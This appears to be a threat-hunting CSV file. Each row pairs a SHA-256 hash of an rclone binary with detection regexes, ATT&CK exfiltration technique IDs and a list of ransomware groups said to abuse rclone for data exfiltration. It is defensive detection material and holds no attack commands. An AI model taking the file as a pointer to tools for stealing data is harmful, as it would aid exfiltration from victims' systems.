"*ea360ab921b4821b8a62f6195fadf9154d890e5119329e0cc44ad8176a92e33a*",".{0,1000}ea360ab921b4821b8a62f6195fadf9154d890e5119329e0cc44ad8176a92e33a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ea3907682992609adfc32f1ffb167494de4816e1d2d3dd8c5323c305105fb12a*",".{0,1000}ea3907682992609adfc32f1ffb167494de4816e1d2d3dd8c5323c305105fb12a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ea54091eaee2f9a0a4e090d0ad6e3c73c60e2c3ba2d78d543163ec75cbfb94d0*",".{0,1000}ea54091eaee2f9a0a4e090d0ad6e3c73c60e2c3ba2d78d543163ec75cbfb94d0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ea675fe25c534b070ab01fcdd67accf393e83f0ad5ff2f17fb3d074cd018c7c8*",".{0,1000}ea675fe25c534b070ab01fcdd67accf393e83f0ad5ff2f17fb3d074cd018c7c8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ea76f081f370ef14155989db6aa6e8250a9f2f31883a9c14c128ad2e4929139d*",".{0,1000}ea76f081f370ef14155989db6aa6e8250a9f2f31883a9c14c128ad2e4929139d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*eaa4491c6db50183a57efd0ce0ae3ba06bd1a30f32321d705610c1286217fa27*",".{0,1000}eaa4491c6db50183a57efd0ce0ae3ba06bd1a30f32321d705610c1286217fa27.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*eab46bfb4e6567cd42bc14502cfd207582ed611746fa51a03542c8df619cf8f8*",".{0,1000}eab46bfb4e6567cd42bc14502cfd207582ed611746fa51a03542c8df619cf8f8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*eac2d73415f7df203e8f868799bfb999687f8b80f57cad3542c0e90805d06020*",".{0,1000}eac2d73415f7df203e8f868799bfb999687f8b80f57cad3542c0e90805d06020.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*eb0a24b253754facae1fd56a8710fe987b9257c64d230bd2196865aa27563003*",".{0,1000}eb0a24b253754facae1fd56a8710fe987b9257c64d230bd2196865aa27563003.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*eb547bd0ef2037118a01003bed6cf00a1d6e6975b6f0a73cb811f882a3c3de72*",".{0,1000}eb547bd0ef2037118a01003bed6cf00a1d6e6975b6f0a73cb811f882a3c3de72.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*eb7160c7aac0ecbceb67f8bea723511584ba789dda8e5e5725f877f7d375aacf*",".{0,1000}eb7160c7aac0ecbceb67f8bea723511584ba789dda8e5e5725f877f7d375aacf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ebef509adaec909b3e11278a029d19db8aa70a6e4cace78c261c82203cff620b*",".{0,1000}ebef509adaec909b3e11278a029d19db8aa70a6e4cace78c261c82203cff620b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ec416ecb630f6b4f291f5997d5317218b8cce171d2add04ea69d7ff9f4d869c6*",".{0,1000}ec416ecb630f6b4f291f5997d5317218b8cce171d2add04ea69d7ff9f4d869c6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ecb08caa2d126063e874bbdcb4de521a0c51de1746fb97fe2e3a384d7ebed51f*",".{0,1000}ecb08caa2d126063e874bbdcb4de521a0c51de1746fb97fe2e3a384d7ebed51f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ece9f171a6734ab8e720be888197c29336308d08335a58dd8e179837111f096f*",".{0,1000}ece9f171a6734ab8e720be888197c29336308d08335a58dd8e179837111f096f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ecf4c181c6d24ca06a9bc352b3fb5a8faa393391d0884d7b20212c72febe66f4*",".{0,1000}ecf4c181c6d24ca06a9bc352b3fb5a8faa393391d0884d7b20212c72febe66f4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ed0892438b4bb9a36ee05c360fed16c100bf56c93cf922769e88224b8288df8d*",".{0,1000}ed0892438b4bb9a36ee05c360fed16c100bf56c93cf922769e88224b8288df8d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ed253174ca80a6c8acc3a0eba49c4a157d4c780a32161d84f387245b9fb41564*",".{0,1000}ed253174ca80a6c8acc3a0eba49c4a157d4c780a32161d84f387245b9fb41564.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ede5208316ef343dad39c0cc595815382526b1d47bcc1454b43cb8a1d1ff29f2*",".{0,1000}ede5208316ef343dad39c0cc595815382526b1d47bcc1454b43cb8a1d1ff29f2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ee067f36a977b3620149fb7a1bd8bce6576b2be781c0870544ec391c80a6d785*",".{0,1000}ee067f36a977b3620149fb7a1bd8bce6576b2be781c0870544ec391c80a6d785.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ee3774da4187f5e28db39a04a4fd6a4c11f0be46387a7375e5863ef9c558a39e*",".{0,1000}ee3774da4187f5e28db39a04a4fd6a4c11f0be46387a7375e5863ef9c558a39e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ee4252ab2dab84bb6a1860649d504452c866007570aaedb91cbe7f734718baab*",".{0,1000}ee4252ab2dab84bb6a1860649d504452c866007570aaedb91cbe7f734718baab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ee73359be8239759b7dba6019f25de89aba70224615f5a9c343725c3e32be7a2*",".{0,1000}ee73359be8239759b7dba6019f25de89aba70224615f5a9c343725c3e32be7a2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ee81cbfdbb043dc706d64de7119e92a43002fb454a045ab6674536b2c9539721*",".{0,1000}ee81cbfdbb043dc706d64de7119e92a43002fb454a045ab6674536b2c9539721.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*eeb1f0b925539af3482eea902d44fe06b1540ddb1794903fe61aef77c0f22fd1*",".{0,1000}eeb1f0b925539af3482eea902d44fe06b1540ddb1794903fe61aef77c0f22fd1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*eed8b56841e75df2c0cbe5131dc21e564c59850a28275fb0362e03d8d932aafe*",".{0,1000}eed8b56841e75df2c0cbe5131dc21e564c59850a28275fb0362e03d8d932aafe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ef0a33964a27c286631d9386230da9953b35733c601f70fe3bc961674822ba5c*",".{0,1000}ef0a33964a27c286631d9386230da9953b35733c601f70fe3bc961674822ba5c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ef0f36cdf1d04e191e26c6d744fedcdbd29951dd599f1414e4efc85fe0c86846*",".{0,1000}ef0f36cdf1d04e191e26c6d744fedcdbd29951dd599f1414e4efc85fe0c86846.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ef1e36b27583da0b2e5b24c79c961e9c43b09d7ea5ec65326213088f27a371b0*",".{0,1000}ef1e36b27583da0b2e5b24c79c961e9c43b09d7ea5ec65326213088f27a371b0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ef378aa93a1ecf584572d815f5f643d1ef6b78764e093ca65db7a27512aefd80*",".{0,1000}ef378aa93a1ecf584572d815f5f643d1ef6b78764e093ca65db7a27512aefd80.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ef3c8c0571a752f2d400f4c94592a791c6db2dab93b85b4d161384a3a76e42f4*",".{0,1000}ef3c8c0571a752f2d400f4c94592a791c6db2dab93b85b4d161384a3a76e42f4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ef460741f5ce36bf8c5e99edc67cb1a88ecba4a25550a136bf9cc3160b58e2fe*",".{0,1000}ef460741f5ce36bf8c5e99edc67cb1a88ecba4a25550a136bf9cc3160b58e2fe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*efacb962d9276a13cc733354f5f42124a0cdf4b8eb5c2c6e65bda9f90945b930*",".{0,1000}efacb962d9276a13cc733354f5f42124a0cdf4b8eb5c2c6e65bda9f90945b930.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*efb17668ff5bc7cb632ddc85ad0d38b020bed85ca6a2b798a31a61abb32b0516*",".{0,1000}efb17668ff5bc7cb632ddc85ad0d38b020bed85ca6a2b798a31a61abb32b0516.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*efc69509f9ba588131f6e9f9dcc38ef159a8881cf336d9f2812c01bf6f4e0737*",".{0,1000}efc69509f9ba588131f6e9f9dcc38ef159a8881cf336d9f2812c01bf6f4e0737.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*eff639cb05e0947c68eecd6f388f3887d2fef6df0ad94cb5459b74a382989ded*",".{0,1000}eff639cb05e0947c68eecd6f388f3887d2fef6df0ad94cb5459b74a382989ded.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
